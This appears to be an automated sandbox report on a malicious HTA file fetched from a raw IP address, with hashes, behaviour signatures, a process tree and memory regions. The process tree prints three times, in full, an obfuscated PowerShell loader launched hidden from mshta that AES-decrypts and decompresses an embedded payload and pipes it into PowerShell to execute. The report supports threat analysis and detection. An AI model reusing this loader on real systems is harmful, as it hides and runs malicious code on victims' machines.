Analysis

  • max time kernel
    120s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/SCAN-atoletter2.hta

  • Size

    1.1MB

  • MD5

    0e02311efc79d0580a3ae453f00cce83

  • SHA1

    77721025336c37d0df3349badaa71e6610c6d429

  • SHA256

    01e20536cc9847e7411bbb0e4d7381774f0e5e4cc86bfd6fdf0e12229d1d2786

  • SHA512

    312589562ec740619629402876f4c077b56e0f3985686a6747c8c1d277f1bb56b41c21ef4fa1054178105a584692d3f6fc09af76e5edf4c6773826836c4b7bae

  • SSDEEP

    1536:y4pLmOmQ7Mf99jXfqe+Wjyosy3vmr/l1vcmafSIm+lIWFR3QXdpkJJ0sVaVMHfFP:y4pLZmQ7CJXReoz3zH

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter2.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TDohU = 'AAAAAAAAAAAAAAAAAAAAAGsUUyZG1ov5a02EsZJ08iND6xtNaHYueIFf1KEbO8sk6iRxkUH3rWkOAU2b0zAIoNDqn+SH7Et754c/eWo/FTHSM0ibAvSB25VdT1n9VfcCtPHYpqmPvh3/RPsjfIQUKE56y3aJwh+C+6prv6udKMhq6/bu51o5kW4qWK0WJvFNbh7djNDcp6ObqNDm65yNdNGC56NxipDnOb72Jt/hXcEo7D1isT4TKr535ODPJvaI8HUXtJM3ClSSm0Ijy8uYD0fus5OdPcwHgyuDGT42w0YQDNxEe29suowP6LjtonRF1xKidUSTlND00BVHohDGk5ikVRbSO34/KkafXPhyrhsPE2t3LbSkUDqSmZv8GctQ4bvdAxnMZLG75kqnZBxLxsrOAMA+Bc6GuMtW4oYBqQXb1T1jRhD9Lupu2G7rxLcR306ybq7DbdROSKmNTlswEbrYF+/i1JzdgtuCtzzB9GtKHAsWvGX6N9u1CSIF2nmS9DducoqHw1EyXJ5k2R4p2awO/rtmbi3v+ic4+HHDiCinin3b6l4XtCW64wdrjdJUYiv7fb9T/3Mm2Nv8v3J5RMxTMp18zFhibOzh14ttVEZethW6zH423U3uiE1qbrIwhZ4a5JZF+B8+kOExz7Og/rZnvuDGvEUng5eRpNheajm35u+F6fUHiF+O7jERqGWAf2mXVbjy4Ii12TJTc2Ox/90Zsb+zpAyHNgW51au22US+8X19SI7Jj2GSp8v/dfDdaHq1aR6OhjJgBz8vusp1RFpFSLgKE6DaruPbL/Ze+T9RoygxoTFcFRLg+9GSO/Yns98FQkwt+o62ub8c37H/YislraFfTc4ZgCb/xou0D9sQRp44NzPCruSq74SL3BkUGDdbsO7EbUnPF9qpdnOJYz8BWbK2TjasowEJzSZDTY1Mmns6JKjTha+1Pxh7bKitckYPldLE2s3Yur8ww6tlx1cRFFoD2Z/eP4AAdwKEn6V3x79FfZSRQbanYSa0e8NkfarxWqPZR2q7Ldyc1U/i1g==';$QhjpuY = 'T1Vab3RURHF4R1RIQVJ6TWJoTmJERVNYQ2lsemFMYXE=';$XNjmYUUU = New-Object 'System.Security.Cryptography.AesManaged';$XNjmYUUU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XNjmYUUU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XNjmYUUU.BlockSize = 128;$XNjmYUUU.KeySize = 256;$XNjmYUUU.Key = [System.Convert]::FromBase64String($QhjpuY);$ZbOvE = [System.Convert]::FromBase64String($TDohU);$CGfOYIRO = $ZbOvE[0..15];$XNjmYUUU.IV = $CGfOYIRO;$LwrOMzefd = $XNjmYUUU.CreateDecryptor();$ldlRDguUf = $LwrOMzefd.TransformFinalBlock($ZbOvE, 16, $ZbOvE.Length - 16);$XNjmYUUU.Dispose();$ynpPY = New-Object System.IO.MemoryStream( , $ldlRDguUf );$CCVny = New-Object System.IO.MemoryStream;$WXaAoEGtt = New-Object System.IO.Compression.GzipStream $ynpPY, ([IO.Compression.CompressionMode]::Decompress);$WXaAoEGtt.CopyTo( $CCVny );$WXaAoEGtt.Close();$ynpPY.Close();[byte[]] $gLXiEJ = $CCVny.ToArray();$mrjDyZl = [System.Text.Encoding]::UTF8.GetString($gLXiEJ);$mrjDyZl | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $TDohU = 'AAAAAAAAAAAAAAAAAAAAAGsUUyZG1ov5a02EsZJ08iND6xtNaHYueIFf1KEbO8sk6iRxkUH3rWkOAU2b0zAIoNDqn+SH7Et754c/eWo/FTHSM0ibAvSB25VdT1n9VfcCtPHYpqmPvh3/RPsjfIQUKE56y3aJwh+C+6prv6udKMhq6/bu51o5kW4qWK0WJvFNbh7djNDcp6ObqNDm65yNdNGC56NxipDnOb72Jt/hXcEo7D1isT4TKr535ODPJvaI8HUXtJM3ClSSm0Ijy8uYD0fus5OdPcwHgyuDGT42w0YQDNxEe29suowP6LjtonRF1xKidUSTlND00BVHohDGk5ikVRbSO34/KkafXPhyrhsPE2t3LbSkUDqSmZv8GctQ4bvdAxnMZLG75kqnZBxLxsrOAMA+Bc6GuMtW4oYBqQXb1T1jRhD9Lupu2G7rxLcR306ybq7DbdROSKmNTlswEbrYF+/i1JzdgtuCtzzB9GtKHAsWvGX6N9u1CSIF2nmS9DducoqHw1EyXJ5k2R4p2awO/rtmbi3v+ic4+HHDiCinin3b6l4XtCW64wdrjdJUYiv7fb9T/3Mm2Nv8v3J5RMxTMp18zFhibOzh14ttVEZethW6zH423U3uiE1qbrIwhZ4a5JZF+B8+kOExz7Og/rZnvuDGvEUng5eRpNheajm35u+F6fUHiF+O7jERqGWAf2mXVbjy4Ii12TJTc2Ox/90Zsb+zpAyHNgW51au22US+8X19SI7Jj2GSp8v/dfDdaHq1aR6OhjJgBz8vusp1RFpFSLgKE6DaruPbL/Ze+T9RoygxoTFcFRLg+9GSO/Yns98FQkwt+o62ub8c37H/YislraFfTc4ZgCb/xou0D9sQRp44NzPCruSq74SL3BkUGDdbsO7EbUnPF9qpdnOJYz8BWbK2TjasowEJzSZDTY1Mmns6JKjTha+1Pxh7bKitckYPldLE2s3Yur8ww6tlx1cRFFoD2Z/eP4AAdwKEn6V3x79FfZSRQbanYSa0e8NkfarxWqPZR2q7Ldyc1U/i1g==';$QhjpuY = 'T1Vab3RURHF4R1RIQVJ6TWJoTmJERVNYQ2lsemFMYXE=';$XNjmYUUU = New-Object 'System.Security.Cryptography.AesManaged';$XNjmYUUU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XNjmYUUU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XNjmYUUU.BlockSize = 128;$XNjmYUUU.KeySize = 256;$XNjmYUUU.Key = [System.Convert]::FromBase64String($QhjpuY);$ZbOvE = [System.Convert]::FromBase64String($TDohU);$CGfOYIRO = $ZbOvE[0..15];$XNjmYUUU.IV = $CGfOYIRO;$LwrOMzefd = $XNjmYUUU.CreateDecryptor();$ldlRDguUf = $LwrOMzefd.TransformFinalBlock($ZbOvE, 16, $ZbOvE.Length - 16);$XNjmYUUU.Dispose();$ynpPY = New-Object System.IO.MemoryStream( , $ldlRDguUf );$CCVny = New-Object System.IO.MemoryStream;$WXaAoEGtt = New-Object System.IO.Compression.GzipStream $ynpPY, ([IO.Compression.CompressionMode]::Decompress);$WXaAoEGtt.CopyTo( $CCVny );$WXaAoEGtt.Close();$ynpPY.Close();[byte[]] $gLXiEJ = $CCVny.ToArray();$mrjDyZl = [System.Text.Encoding]::UTF8.GetString($gLXiEJ);$mrjDyZl | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $TDohU = 'AAAAAAAAAAAAAAAAAAAAAGsUUyZG1ov5a02EsZJ08iND6xtNaHYueIFf1KEbO8sk6iRxkUH3rWkOAU2b0zAIoNDqn+SH7Et754c/eWo/FTHSM0ibAvSB25VdT1n9VfcCtPHYpqmPvh3/RPsjfIQUKE56y3aJwh+C+6prv6udKMhq6/bu51o5kW4qWK0WJvFNbh7djNDcp6ObqNDm65yNdNGC56NxipDnOb72Jt/hXcEo7D1isT4TKr535ODPJvaI8HUXtJM3ClSSm0Ijy8uYD0fus5OdPcwHgyuDGT42w0YQDNxEe29suowP6LjtonRF1xKidUSTlND00BVHohDGk5ikVRbSO34/KkafXPhyrhsPE2t3LbSkUDqSmZv8GctQ4bvdAxnMZLG75kqnZBxLxsrOAMA+Bc6GuMtW4oYBqQXb1T1jRhD9Lupu2G7rxLcR306ybq7DbdROSKmNTlswEbrYF+/i1JzdgtuCtzzB9GtKHAsWvGX6N9u1CSIF2nmS9DducoqHw1EyXJ5k2R4p2awO/rtmbi3v+ic4+HHDiCinin3b6l4XtCW64wdrjdJUYiv7fb9T/3Mm2Nv8v3J5RMxTMp18zFhibOzh14ttVEZethW6zH423U3uiE1qbrIwhZ4a5JZF+B8+kOExz7Og/rZnvuDGvEUng5eRpNheajm35u+F6fUHiF+O7jERqGWAf2mXVbjy4Ii12TJTc2Ox/90Zsb+zpAyHNgW51au22US+8X19SI7Jj2GSp8v/dfDdaHq1aR6OhjJgBz8vusp1RFpFSLgKE6DaruPbL/Ze+T9RoygxoTFcFRLg+9GSO/Yns98FQkwt+o62ub8c37H/YislraFfTc4ZgCb/xou0D9sQRp44NzPCruSq74SL3BkUGDdbsO7EbUnPF9qpdnOJYz8BWbK2TjasowEJzSZDTY1Mmns6JKjTha+1Pxh7bKitckYPldLE2s3Yur8ww6tlx1cRFFoD2Z/eP4AAdwKEn6V3x79FfZSRQbanYSa0e8NkfarxWqPZR2q7Ldyc1U/i1g==';$QhjpuY = 'T1Vab3RURHF4R1RIQVJ6TWJoTmJERVNYQ2lsemFMYXE=';$XNjmYUUU = New-Object 'System.Security.Cryptography.AesManaged';$XNjmYUUU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XNjmYUUU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XNjmYUUU.BlockSize = 128;$XNjmYUUU.KeySize = 256;$XNjmYUUU.Key = [System.Convert]::FromBase64String($QhjpuY);$ZbOvE = [System.Convert]::FromBase64String($TDohU);$CGfOYIRO = $ZbOvE[0..15];$XNjmYUUU.IV = $CGfOYIRO;$LwrOMzefd = $XNjmYUUU.CreateDecryptor();$ldlRDguUf = $LwrOMzefd.TransformFinalBlock($ZbOvE, 16, $ZbOvE.Length - 16);$XNjmYUUU.Dispose();$ynpPY = New-Object System.IO.MemoryStream( , $ldlRDguUf );$CCVny = New-Object System.IO.MemoryStream;$WXaAoEGtt = New-Object System.IO.Compression.GzipStream $ynpPY, ([IO.Compression.CompressionMode]::Decompress);$WXaAoEGtt.CopyTo( $CCVny );$WXaAoEGtt.Close();$ynpPY.Close();[byte[]] $gLXiEJ = $CCVny.ToArray();$mrjDyZl = [System.Text.Encoding]::UTF8.GetString($gLXiEJ);$mrjDyZl
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2840

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c3247674d377364bb81cfeb145fab0fe

    SHA1

    c56543acd0a244f4cbd8b056afe306fc0bd24863

    SHA256

    3a7184a8b837830abe64bb3b962efcdce778c7c8346fb3cc02aa85c5e430e7d3

    SHA512

    e465b4c39c9a5f7f1553fd13ba9d680adba3b6d40e8905f3d2e6b0ecd29bfaa3ddffef5454b200c0364eaddb70eade2cd7180afde89b58d3ebeb82688c229ea9

  • memory/2044-2-0x00000000728C0000-0x0000000072E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2044-5-0x0000000002410000-0x0000000002450000-memory.dmp

    Filesize

    256KB

  • memory/2044-4-0x0000000002410000-0x0000000002450000-memory.dmp

    Filesize

    256KB

  • memory/2044-3-0x00000000728C0000-0x0000000072E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2044-6-0x00000000728C0000-0x0000000072E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2664-19-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2664-17-0x0000000072900000-0x0000000072EAB000-memory.dmp

    Filesize

    5.7MB

  • memory/2664-23-0x0000000072900000-0x0000000072EAB000-memory.dmp

    Filesize

    5.7MB

  • memory/2664-34-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2664-31-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2664-36-0x0000000072900000-0x0000000072EAB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-18-0x0000000072900000-0x0000000072EAB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-25-0x0000000001C10000-0x0000000001C50000-memory.dmp

    Filesize

    256KB

  • memory/2840-29-0x0000000072900000-0x0000000072EAB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-33-0x0000000001C10000-0x0000000001C50000-memory.dmp

    Filesize

    256KB

  • memory/2840-35-0x0000000072900000-0x0000000072EAB000-memory.dmp

    Filesize

    5.7MB